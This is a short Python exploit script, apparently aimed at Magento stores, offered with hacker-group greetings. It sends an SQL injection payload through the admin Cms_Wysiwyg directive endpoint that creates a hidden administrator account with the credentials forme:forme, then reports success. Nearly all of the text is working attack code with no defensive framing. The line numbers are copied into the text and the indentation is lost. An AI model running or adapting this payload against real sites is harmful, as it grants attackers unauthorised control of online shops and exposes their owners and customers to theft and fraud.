#Thanks to# Zero cool, code breaker ICA, Team indishell, my father , rr mam, j

1. #Thanks to
2. # Zero cool, code breaker ICA, Team indishell, my father , rr mam, jagriti and DON
3. import requests
4. import base64
5. import sys
6.  
7. target = "http://www.###.com/"
8.  
9. if not target.startswith("http"):
10. target = "http://" + target
11.  
12. if target.endswith("/"):
13. target = target[:-1]
14.  
15. target_url = target + "/admin/Cms_Wysiwyg/directive/index/"
16.  
17. q="""
18. SET @SALT = 'rp';
19. SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
20. SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
21. INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Eerstenaam','Laatstenaam','geen@idee.nl','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
22. INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Eerstenaam');
23. """
24.  
25.  
26. query = q.replace("\n", "").format(username="forme", password="forme")
27. pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
28.  
29. # e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
30. r = requests.post(target_url,
31. data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
32. "filter": base64.b64encode(pfilter),
33. "forwarded": 1})
34. if r.ok:
35. print ("WORKED")
36. print ("Check {0}/admin with creds forme:forme".format(target))
37. else:
38. print ("DID NOT WORK")